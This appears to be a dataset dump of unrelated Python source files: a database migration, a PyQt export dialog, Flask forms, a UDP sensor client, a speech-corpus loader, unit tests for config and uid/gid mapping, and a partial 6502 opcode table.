content stringlengths 5 1.05M |
|---|
"""empty message
Revision ID: 1dda1de84b36
Revises:
Create Date: 2019-11-17 11:24:28.953423
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '1dda1de84b36'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema.

    Tables: admins, events, lectures, students, plus the two
    association tables lecture_admins and student_events.
    Parent tables are created before the tables that reference them.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('admins',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('email', sa.String(length=100), nullable=False),
    sa.Column('password', sa.String(length=255), nullable=False),
    sa.Column('first_name', sa.String(length=100), nullable=False),
    sa.Column('last_name', sa.String(length=100), nullable=False),
    sa.Column('is_lecturer', sa.Boolean(), nullable=True),
    sa.Column('status', sa.Boolean(), nullable=True),
    sa.Column('auth_key', sa.String(length=255), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email')
    )
    op.create_table('events',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('name', sa.String(length=255), nullable=False),
    sa.Column('desc', sa.Text(), nullable=True),
    sa.Column('status', sa.Boolean(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    # Lectures belong to an event (nullable FK).
    op.create_table('lectures',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('event_id', sa.Integer(), nullable=True),
    sa.Column('topic', sa.String(length=255), nullable=False),
    sa.Column('desc', sa.Text(), nullable=True),
    sa.Column('zoom_link', sa.String(length=255), nullable=True),
    sa.Column('datetime', sa.DateTime(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.ForeignKeyConstraint(['event_id'], ['events.id'], )
    )
    op.create_table('students',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('email', sa.String(length=100), nullable=False),
    sa.Column('password', sa.String(length=255), nullable=False),
    sa.Column('first_name', sa.String(length=100), nullable=False),
    sa.Column('last_name', sa.String(length=100), nullable=False),
    sa.Column('is_verified', sa.Boolean(), nullable=True),
    sa.Column('is_premium', sa.Boolean(), nullable=True),
    sa.Column('status', sa.Boolean(), nullable=True),
    sa.Column('auth_key', sa.String(length=255), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email')
    )
    # Many-to-many: which admins run which lectures.
    op.create_table('lecture_admins',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('lecture_id', sa.Integer(), nullable=True),
    sa.Column('admin_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['admin_id'], ['admins.id'], ),
    sa.ForeignKeyConstraint(['lecture_id'], ['lectures.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # Many-to-many: which students attend which events.
    op.create_table('student_events',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('is_deleted', sa.Boolean(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('event_id', sa.Integer(), nullable=True),
    sa.Column('student_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['event_id'], ['events.id'], ),
    sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop every table created by upgrade().

    Association/child tables are dropped before their parents so that
    no foreign key ever references a missing table.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    for table_name in ('student_events', 'lecture_admins', 'students',
                       'lectures', 'events', 'admins'):
        op.drop_table(table_name)
    # ### end Alembic commands ###
|
from PyQt5.QtCore import (Qt)
from PyQt5.QtWidgets import (QDialog, QVBoxLayout, QHBoxLayout,
QLineEdit, QLabel, QComboBox,
QCheckBox, QFrame,
QDialogButtonBox, QMessageBox)
import os
class ExportLayerAnimDialog(QDialog):
    """Dialog collecting export settings for layer/animation export.

    NOTE(review): `i18n` and `Application` are not imported here; they
    appear to be globals injected by the host application (presumably
    Krita's scripting environment) — confirm before reusing elsewhere.
    """

    def __init__(self, exportLayerAnim, parent=None):
        # exportLayerAnim: controller object holding the export settings
        # (exportDir, namePrefix, extension, useCompositions, firstFrame,
        # exportPath) and performing the export via export().
        super(ExportLayerAnimDialog, self).__init__(parent)
        self.exportLayerAnim = exportLayerAnim
        self.mainLayout = QVBoxLayout(self)
        self.formLayout = QHBoxLayout()
        self.exportDirLineEdit = QLineEdit()
        self.namePrefixLineEdit = QLineEdit()
        self.exampleLabel = QLabel()
        self.helpLabel = QLabel()
        self.extensionComboBox = QComboBox()
        self.useCompositionsBox = QCheckBox(i18n("Use compositions"))
        self.firstFrameBox = QCheckBox(i18n("First frame only"))
        self.buttonBox = QDialogButtonBox(
            QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        # Keep the example path label in sync with every input change.
        self.exportDirLineEdit.textChanged.connect(self.updateLabels)
        self.namePrefixLineEdit.textChanged.connect(self.updateLabels)
        self.extensionComboBox.addItems(["png", "jpg"])
        self.exampleLabel.setWordWrap(True)
        self.exampleLabel.setTextFormat(Qt.RichText)
        self.exampleLabel.setIndent(5)
        self.useCompositionsBox.stateChanged.connect(self.updateLabels)
        self.firstFrameBox.stateChanged.connect(self.updateLabels)
        self.helpLabel.setWordWrap(True)
        self.helpLabel.setTextFormat(Qt.RichText)
        self.helpLabel.setText(i18n("Add the followings to layer's name:")
                               + "<br/>- <code>NE</code>: " + i18n("won't be exported")
                               + "<br/>- <code>EC</code>: " + i18n("export children")
                               )
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        # Single-row form: directory, prefix and file type side by side.
        self.formLayout.addWidget(QLabel(i18n("Directory:")))
        self.formLayout.addWidget(self.exportDirLineEdit)
        self.formLayout.addWidget(QLabel(i18n("Prefix:")))
        self.formLayout.addWidget(self.namePrefixLineEdit)
        self.formLayout.addWidget(QLabel(i18n("Type:")))
        self.formLayout.addWidget(self.extensionComboBox)
        self.mainLayout.addLayout(self.formLayout)
        self.mainLayout.addWidget(self.exampleLabel)
        hLayout = QHBoxLayout()
        hLayout.addWidget(self.useCompositionsBox)
        hLayout.addWidget(self.firstFrameBox)
        self.mainLayout.addLayout(hLayout)
        # Horizontal separator line.
        line = QFrame()
        line.setFrameStyle(QFrame.HLine | QFrame.Sunken)
        self.mainLayout.addWidget(line)
        self.mainLayout.addWidget(self.helpLabel)
        line = QFrame()
        line.setFrameStyle(QFrame.HLine | QFrame.Sunken)
        self.mainLayout.addWidget(line)
        self.mainLayout.addWidget(self.buttonBox)
        self.setWindowTitle(i18n("Export layers & anim"))
        self.resize(400, 100)

    def initialize(self):
        """Populate the widgets from the controller and show the dialog modally."""
        self.exportDirLineEdit.setText(self.exportLayerAnim.exportDir)
        self.namePrefixLineEdit.setText(self.exportLayerAnim.namePrefix)
        self.extensionComboBox.setCurrentText(self.exportLayerAnim.extension)
        self.useCompositionsBox.setChecked(self.exportLayerAnim.useCompositions)
        self.firstFrameBox.setChecked(self.exportLayerAnim.firstFrame)
        self.updateLabels()
        self.show()
        self.activateWindow()
        # Blocks until the dialog is accepted or rejected.
        self.exec_()

    def updateLabels(self):
        """Rebuild the example output path from the current widget values."""
        self.exampleLabel.setText(i18n("Files path example:") + " "
                                  + self.exportLayerAnim.exportPath
                                  + ("/" + self.exportDirLineEdit.text() if self.exportDirLineEdit.text() != "" else "")
                                  + "/" + self.namePrefixLineEdit.text()
                                  + "<i>" + (i18n("Composition") if self.useCompositionsBox.isChecked() else "")
                                  + ("_" if self.namePrefixLineEdit.text() != "" or self.useCompositionsBox.isChecked() else "") + (i18n("Layer_Frame") if not self.firstFrameBox.isChecked() else i18n("Layer"))
                                  + "</i>." + self.extensionComboBox.currentText())

    def accept(self):
        """Copy widget values back to the controller, run the export, notify."""
        self.exportLayerAnim.exportDir = self.exportDirLineEdit.text()
        self.exportLayerAnim.namePrefix = self.namePrefixLineEdit.text()
        self.exportLayerAnim.extension = self.extensionComboBox.currentText()
        self.exportLayerAnim.useCompositions = self.useCompositionsBox.isChecked()
        self.exportLayerAnim.firstFrame = self.firstFrameBox.isChecked()
        self.exportLayerAnim.export()
        QMessageBox.information(Application.activeWindow().qwindow(), i18n("Exportation done"), i18n("Files created in") + " " + self.exportLayerAnim.exportPath + " :" + self.exportLayerAnim.layersName)
        super(ExportLayerAnimDialog, self).accept()

    def closeEvent(self, event):
        """Always allow the window to close."""
        event.accept()
|
from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField, SubmitField
from wtforms.validators import InputRequired, NumberRange
class NameForm(FlaskForm):
    """Simple form asking only for a full name (required)."""
    name = StringField("Full Name", validators=[InputRequired("Please add a name.")])  # add validation here
    submit = SubmitField("Submit")
class NameFormSecond(FlaskForm):
    """Form asking for a full name and an age restricted to 13-60."""
    name = StringField("Full Name", validators=[InputRequired()])
    age = IntegerField(
        "Age",
        validators=[
            InputRequired(),
            # Reject ages outside the allowed band with a clear message.
            NumberRange(min=13, max=60, message="Age must be between 13 and 60."),
        ],
    )
    submit = SubmitField("Submit")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import sys
import json
import select
import logging
#logging.basicConfig(level=logging.DEBUG)
udpTimeout = 4
ADDR = 'heizungeg'
PORT = 5023
def getcmds():
    """Return the list of command names the BME280 UDP server understands."""
    return [
        'getTemperature',
        'getHumidity',
        'getPressure',
    ]
def hilf():
    """Print the interactive help/usage text."""
    help_lines = (
        '',
        '*******************************',
        'Test tool for BME280 UDP server',
        '',
        'Commands:',
        't -> get Temperature',
        'h -> get Humidity',
        'p -> get Pressure',
        '',
        '? -> This Text',
        'q -> Quit',
    )
    for line in help_lines:
        print(line)
def getch():
    """Read a single character from stdin without waiting for Enter.

    Switches the controlling terminal into raw mode for the duration of
    the read; the previous terminal settings are restored in all cases
    via the finally block (TCSADRAIN waits for pending output first).

    Returns:
        str: the single character read.
    """
    import sys, tty, termios
    fd = sys.stdin.fileno( )
    old_settings = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)
        ch = sys.stdin.read(1)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
    return ch
def tcpRemote(msg, **kwargs):
    """Placeholder for a TCP transport counterpart of udpRemote.

    Not implemented yet; currently a no-op that returns None.
    """
    # Todo
    pass
def udpRemote(msg, **kwargs):
    """Send a JSON command string to the server via UDP and return the reply.

    Args:
        msg: JSON string to send (server protocol specific).

    Keyword Args:
        udpSocket: an already-open UDP socket to reuse; if omitted a new
            non-blocking socket is created (and closed before returning).
        addr, port: destination host/port; default to ADDR/PORT when missing.

    Returns:
        str: the decoded reply on success, or -1 on timeout/error
        (error-code return kept for backward compatibility).
    """
    # Resolve the destination unconditionally. Previously addr/port were
    # only assigned in the "no socket passed" branch, so passing
    # udpSocket= made sendto() raise NameError — swallowed by the broad
    # except below, silently returning -1.
    if 'addr' not in kwargs or 'port' not in kwargs:
        logging.info("Uiui, wohin soll ich mich nur verbinden? Naja, standard halt.")
    addr = kwargs.get('addr', ADDR)
    port = kwargs.get('port', PORT)

    own_socket = False  # True when we created the socket and must close it
    if 'udpSocket' in kwargs:
        udpSocket = kwargs.get('udpSocket')
    else:
        logging.info("Öffne Socket")
        try:
            udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            # Non-blocking: readiness is handled via select() below.
            udpSocket.setblocking(0)
            own_socket = True
        except Exception as e:
            logging.info(str(e))
            return -1

    try:
        ret = -1
        logging.info("So laut des heit: %s", msg)
        # Wait until the socket is writable, then send.
        ready = select.select([], [udpSocket], [], udpTimeout)
        if ready[1]:
            udpSocket.sendto(msg.encode(), (addr, port))
            logging.info("Gesendet")
            # Wait for the reply (or give up after udpTimeout seconds).
            ready = select.select([udpSocket], [], [], udpTimeout)
            if ready[0]:
                data, addr = udpSocket.recvfrom(1024)
                logging.info(data.decode())
                ret = data.decode()
        return ret
    except Exception as e:
        logging.info(str(e))
        return -1
    finally:
        # Close only sockets we opened ourselves; callers keep theirs.
        if own_socket:
            udpSocket.close()
def main():
    """Interactive loop: read one-key commands, query the UDP server, print JSON.

    With no CLI arguments, shows the help text and enters the key loop;
    with any argument, logs a complaint and returns.
    """
    if len(sys.argv) == 1:
        hilf()
        while True:
            try:
                cmd = getch()
                # valid starts at 0 and is only set for commands that
                # produce a request. The original set valid=1 up front,
                # so pressing '?' first raised NameError on the then
                # undefined json_string (and later re-sent a stale one).
                valid = 0
                if cmd == "t":
                    json_string = '{"command" : "getTemperature"}\n'
                    valid = 1
                elif cmd == "h":
                    json_string = '{"command" : "getHumidity"}\n'
                    valid = 1
                elif cmd == "p":
                    json_string = '{"command" : "getPressure"}\n'
                    valid = 1
                elif cmd == "?":
                    hilf()
                elif cmd == "q":
                    logging.info("Bye")
                    break
                else:
                    logging.info("Invalid command")
                if valid:
                    ret = udpRemote(json_string, addr="heizungeg.home", port=5023)
                    if ret != -1:
                        try:
                            print(json.dumps(json.loads(ret), indent=4))
                        except Exception as e:
                            print("ups:", e)
            except KeyboardInterrupt:
                logging.info("Bye")
                break
    else:
        log = "Not a valid command"
        logging.info(log)
        # Original also called syslog.syslog(log), but the syslog module
        # was never imported, so that line always raised NameError.
        # Dropped in favor of the logging call above.
    return ()


if __name__ == "__main__":
    main()
|
"""Load the TIMIT dataset."""
import os
from scipy.io import wavfile
from python.params import MIN_EXAMPLE_LENGTH, MAX_EXAMPLE_LENGTH
from python.dataset.config import CORPUS_DIR
from python.dataset.txt_files import generate_txt
# Path to the TIMIT dataset.
__NAME = 'timit'
__FOLDER_NAME = 'timit/TIMIT'
__TARGET_PATH = os.path.realpath(os.path.join(CORPUS_DIR, __FOLDER_NAME))
def timit_loader():
    """Generate the train/test TXT listings for the TIMIT corpus.

    Returns:
        Tuple[str]: Paths of the generated TXT files, train first.
    """
    return tuple(
        generate_txt(__NAME, target, __timit_loader(target))
        for target in ('train', 'test')
    )
def __timit_loader(target):
    """Build the output lines for one TIMIT partition.

    Args:
        target (str): 'train' or 'test'.

    Returns:
        List[str]: Lines of the form "<relative_wav_path> <transcription>\n".

    Raises:
        ValueError: If the corpus directory, the listing file, or the
            target name is invalid.
    """
    if not os.path.isdir(__TARGET_PATH):
        raise ValueError('"{}" is not a directory.'.format(__TARGET_PATH))
    if target not in ('train', 'test'):
        raise ValueError('Timit only supports "train" and "test" targets.')
    # Location of timit intern .txt file listings.
    train_txt_path = os.path.join(__TARGET_PATH, 'train_all.txt')
    test_txt_path = os.path.join(__TARGET_PATH, 'test_all.txt')
    # Select target.
    master_txt_path = train_txt_path if target == 'train' else test_txt_path
    if not os.path.isfile(master_txt_path):
        raise ValueError('"{}" is not a file.'.format(master_txt_path))
    with open(master_txt_path, 'r') as f:
        master_data = f.readlines()
    output = []
    for line in master_data:
        wav_path, txt_path, _, _ = line.split(',')
        txt_path = os.path.join(__TARGET_PATH, txt_path)
        # Skip SAx.WAV files, since they are repeated by every speaker
        # in the dataset.
        basename = os.path.basename(wav_path)
        if basename in ('SA1.WAV', 'SA2.WAV'):
            continue
        with open(txt_path, 'r') as f:
            txt = f.readlines()
        # Fixed typo in the message ("to many" -> "too many").
        assert len(txt) == 1, 'Text file contains too many lines. ({})'.format(txt_path)
        # Drop the leading "<start> <end>" sample markers, keep the text.
        txt = txt[0].split(' ', 2)[2]
        # Absolute path.
        wav_path = os.path.join(__TARGET_PATH, wav_path)
        # Validate that the example length is within boundaries.
        (sr, y) = wavfile.read(wav_path)
        length_sec = len(y) / sr
        if not MIN_EXAMPLE_LENGTH <= length_sec <= MAX_EXAMPLE_LENGTH:
            continue
        # Relative path to `DATASET_PATH`.
        wav_path = os.path.relpath(wav_path, CORPUS_DIR)
        output.append('{} {}\n'.format(wav_path, txt.strip()))
    return output
|
import contextlib
import io
from typing import ContextManager, TextIO
import pytest
from synctogit import config
class MemoryConfigReadWriter(config.ConfigReadWriter):
    """In-memory ConfigReadWriter backed by a single StringIO buffer."""

    def __init__(self, text: str) -> None:
        self.file = io.StringIO(text)

    @contextlib.contextmanager
    def reader(self) -> ContextManager[TextIO]:
        """Yield the buffer rewound to the start for reading."""
        self.file.seek(0)
        yield self.file

    @contextlib.contextmanager
    def writer(self) -> ContextManager[TextIO]:
        """Yield the buffer emptied and rewound, ready for a full rewrite."""
        self.file.truncate(0)
        self.file.seek(0)
        yield self.file

    def text(self) -> str:
        """Return the complete current contents of the buffer."""
        self.file.seek(0)
        return self.file.read()
def test_read_config():
    # Typed config items (str/bool/int) read back the expected values
    # from a single INI document, including an empty string value.
    conf = """
[git]
repo_dir = git
push = false
num = 3
[evernote]
sandbox = true
token =
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    assert config.StrConfigItem("git", "repo_dir").get(conf) == "git"
    assert config.BoolConfigItem("git", "push").get(conf) is False
    assert config.IntConfigItem("git", "num").get(conf) == 3
    assert config.BoolConfigItem("evernote", "sandbox").get(conf) is True
    assert config.StrConfigItem("evernote", "token").get(conf) == ""
def test_comments():
    # Commented-out keys must behave exactly like missing keys:
    # reading them raises KeyError.
    conf = """
; large comment
[git]
; comment = 1
[evernote]
sandbox = true
; token = aaa
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    evernote_sandbox = config.BoolConfigItem("evernote", "sandbox")
    git_comment = config.IntConfigItem("git", "comment")
    evernote_token = config.StrConfigItem("evernote", "token")
    assert evernote_sandbox.get(conf) is True
    with pytest.raises(KeyError):
        git_comment.get(conf)
    with pytest.raises(KeyError):
        evernote_token.get(conf)
def test_bool():
    # Accepted truthy spellings: 1/true/True/yes; falsy: 0/false/False/no.
    # Anything else (e.g. "None") raises ValueError.
    conf = """
[git]
a = 1
b = true
c = True
d = yes
e = 0
f = false
g = False
h = no
i = None
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    assert config.BoolConfigItem("git", "a").get(conf) is True
    assert config.BoolConfigItem("git", "b").get(conf) is True
    assert config.BoolConfigItem("git", "c").get(conf) is True
    assert config.BoolConfigItem("git", "d").get(conf) is True
    assert config.BoolConfigItem("git", "e").get(conf) is False
    assert config.BoolConfigItem("git", "f").get(conf) is False
    assert config.BoolConfigItem("git", "g").get(conf) is False
    assert config.BoolConfigItem("git", "h").get(conf) is False
    with pytest.raises(ValueError):
        assert config.BoolConfigItem("git", "i").get(conf) is False
def test_write():
    # Round-trip write test: set/unset an item and adding a new section
    # must rewrite the whole document through the read_writer.
    conf = """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    evernote_token = config.StrConfigItem("evernote", "token")
    evernote_token.set(conf, "new-token")
    assert evernote_token.get(conf) == "new-token"
    # Unfortunately, configparser strips the comments :(
    assert (
        read_writer.text()
        == """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
token = new-token
"""
    )
    # Unsetting removes the key again; reading it raises KeyError.
    evernote_token.unset(conf)
    with pytest.raises(KeyError):
        evernote_token.get(conf)
    assert (
        read_writer.text()
        == """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
"""
    )
    # Setting items in a previously unknown section creates the section.
    config.IntConfigItem("newsect", "num").set(conf, 42)
    config.BoolConfigItem("newsect", "bool").set(conf, True)
    assert (
        read_writer.text()
        == """
[git]
repo_dir = git
push = false
[evernote]
; comment before sandbox
sandbox = true
; comment in the end
[newsect]
num = 42
bool = True
"""
    )
def test_defaults():
    # Missing section/key without a default raises KeyError; supplying a
    # default (even None) returns it instead.
    conf = """
[git]
a = s
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    with pytest.raises(KeyError):
        config.StrConfigItem("no", "b").get(conf)
    with pytest.raises(KeyError):
        config.StrConfigItem("git", "b").get(conf)
    with pytest.raises(KeyError):
        config.IntConfigItem("git", "b").get(conf)
    with pytest.raises(KeyError):
        config.BoolConfigItem("git", "b").get(conf)
    assert config.StrConfigItem("no", "b", "yeah").get(conf) == "yeah"
    assert config.StrConfigItem("git", "b", "a-ha").get(conf) == "a-ha"
    assert config.IntConfigItem("git", "b", 42).get(conf) == 42
    assert config.BoolConfigItem("git", "b", True).get(conf) is True
    assert config.StrConfigItem("git", "b", None).get(conf) is None
def test_isset():
    # isset() reflects presence; note it still validates the value type,
    # so a non-int value under an IntConfigItem raises ValueError.
    conf = """
[aa]
num = 5
s = hi
"""
    read_writer = MemoryConfigReadWriter(conf)
    conf = config.Config(read_writer)
    non_existing = config.IntConfigItem("bb", "cc")
    assert not non_existing.isset(conf)
    non_existing.set(conf, 6)
    assert non_existing.isset(conf)
    num = config.IntConfigItem("aa", "num")
    assert num.isset(conf)
    bad_num = config.IntConfigItem("aa", "s", 5)
    with pytest.raises(ValueError):
        bad_num.isset(conf)
|
#!/usr/bin/env python
# Copyright (c) 2015, Andre Lucas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import grp
import logging
import os
import pwd
import unittest
from hsync.idmapper import *
from hsync.utility import is_dir_excluded, is_path_pre_excluded
log = logging.getLogger()
class FileHashSymlinkSourceNormUnitTestcase(unittest.TestCase):
    """Unit tests for UidGidMapper's uid/gid <-> name/group mapping.

    Fix: replaced every ``assertEquals`` (a long-deprecated alias that
    was removed in Python 3.12) with ``assertEqual``.
    """

    # Identity of the user running the tests; used both as the expected
    # results for the obvious mappings and as the documented fallback
    # for bogus ids/names.
    my_uid = os.getuid()
    my_gid = os.getgid()
    my_name = pwd.getpwuid(my_uid).pw_name
    my_group = grp.getgrgid(my_gid).gr_name

    def setUp(self):
        self.m = UidGidMapper()

    def test_obvious(self):
        '''Test obvious uid and gid idmapper mappings'''
        self.assertEqual(self.m.get_name_for_uid(os.getuid()), self.my_name,
                         "uid->name is mapped properly")
        self.assertEqual(self.m.get_uid_for_name(self.my_name), self.my_uid,
                         "name->uid is mapped properly")
        self.assertEqual(self.m.get_group_for_gid(os.getgid()), self.my_group,
                         "gid->group is mapped properly")
        self.assertEqual(self.m.get_gid_for_group(self.my_group), self.my_gid,
                         "group->gid is mapped properly")

    def test_nonExistentIds(self):
        '''Bogus idmapper uid and gid should not cause KeyError'''
        self.assertEqual(self.m.get_name_for_uid(99999), self.my_name,
                         "Bogus uid should not throw KeyError")
        self.assertEqual(self.m.get_group_for_gid(99999), self.my_group,
                         "Bogus gid should not throw KeyError")

    def test_nonExistentNames(self):
        '''Bogus idmapper user and group should not cause KeyError'''
        self.assertEqual(self.m.get_uid_for_name('bogusname'),
                         self.my_uid, "Bogus name should not throw KeyError")
        self.assertEqual(self.m.get_gid_for_group('bogusgroup'),
                         self.my_gid, "Bogus group should not throw KeyError")

    def test_good_defaults(self):
        '''Sensible defaults are accepted and get obvious results'''
        self.m.set_default_uid(self.my_uid)
        self.assertEqual(self.m.default_name, self.my_name)
        self.m.set_default_name(self.my_name)
        self.assertEqual(self.m.default_uid, self.my_uid)
        self.m.set_default_gid(self.my_gid)
        self.assertEqual(self.m.default_group, self.my_group)
        self.m.set_default_group(self.my_group)
        self.assertEqual(self.m.default_gid, self.my_gid)

    def test_bad_defaults_raise(self):
        '''Bogus idmapper set_default_*()s raise exceptions'''
        with self.assertRaises(KeyError):
            self.m.set_default_uid(99999)
        with self.assertRaises(KeyError):
            self.m.set_default_gid(99999)
        with self.assertRaises(KeyError):
            self.m.set_default_name('madeupname')
        with self.assertRaises(KeyError):
            self.m.set_default_group('madeupgroup')
|
from cpu import AddressingMode
class OpCode:
    """Static description of one 6502 CPU opcode.

    The original annotations were Rust-style strings ('u8',
    "&'static str"); replaced with the corresponding Python types.
    """

    def __init__(self,
                 code: int,
                 mnemonic: str,
                 len: int,
                 cycles: int,
                 mode: 'AddressingMode'):
        # Opcode byte value (0x00..0xFF).
        self.code = code
        # Assembler mnemonic, e.g. 'LDA'.
        self.mnemonic = mnemonic
        # Total instruction length in bytes (opcode + operands).
        # NOTE(review): parameter name shadows builtin len(); renaming
        # would change the keyword interface, so it is kept.
        self.len = len
        # Base cycle count; page-cross penalties are noted in the table.
        self.cycles = cycles
        self.mode = mode
# Master table of supported 6502 opcodes:
# (opcode byte, mnemonic, length in bytes, base cycles, addressing mode).
# Cycle counts are the base values; the inline comments mark variants
# with page-cross or branch penalties.
CPU_OPS_CODES = [
    OpCode(0x00, 'BRK', 1, 7, AddressingMode.NoneAddressing),
    OpCode(0xea, 'NOP', 1, 2, AddressingMode.NoneAddressing),
    # --- Arithmetic
    OpCode(0x69, 'ADC', 2, 2, AddressingMode.Immediate),
    OpCode(0x65, 'ADC', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x75, 'ADC', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x6d, 'ADC', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0x7d, 'ADC', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0x79, 'ADC', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0x61, 'ADC', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0x71, 'ADC', 2, 5, AddressingMode.Indirect_Y),
    # ---
    OpCode(0xe9, 'SBC', 2, 2, AddressingMode.Immediate),
    OpCode(0xe5, 'SBC', 2, 3, AddressingMode.ZeroPage),
    OpCode(0xf5, 'SBC', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0xed, 'SBC', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0xfd, 'SBC', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0xf9, 'SBC', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0xe1, 'SBC', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0xf1, 'SBC', 2, 5, AddressingMode.Indirect_Y),
    # ---
    OpCode(0x29, 'AND', 2, 2, AddressingMode.Immediate),
    OpCode(0x25, 'AND', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x35, 'AND', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x2d, 'AND', 3, 4, AddressingMode.Absolute),
    # /*+1 if page crossed*/
    OpCode(0x3d, 'AND', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0x39, 'AND', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0x21, 'AND', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0x31, 'AND', 2, 5, AddressingMode.Indirect_Y),
    # ---
    # /*+1 if page crossed*/
    OpCode(0x49, 'EOR', 2, 2, AddressingMode.Immediate),
    OpCode(0x45, 'EOR', 2, 3, AddressingMode.ZeroPage),
    OpCode(0x55, 'EOR', 2, 4, AddressingMode.ZeroPage_X),
    OpCode(0x4d, 'EOR', 3, 4, AddressingMode.Absolute),
    OpCode(0x5d, 'EOR', 3, 4, AddressingMode.Absolute_X),
    # /*+1 if page crossed*/
    OpCode(0x59, 'EOR', 3, 4, AddressingMode.Absolute_Y),
    OpCode(0x41, 'EOR', 2, 6, AddressingMode.Indirect_X),
    # /*+1 if page crossed*/
    OpCode(0x51, 'EOR', 2, 5, AddressingMode.Indirect_Y),
    # ---
    OpCode(0x09, 'ORA', 2, 2, AddressingMode.Immediate),
    OpCode(0x05, 'ORA', 2, 3, AddressingMode.ZeroPage),
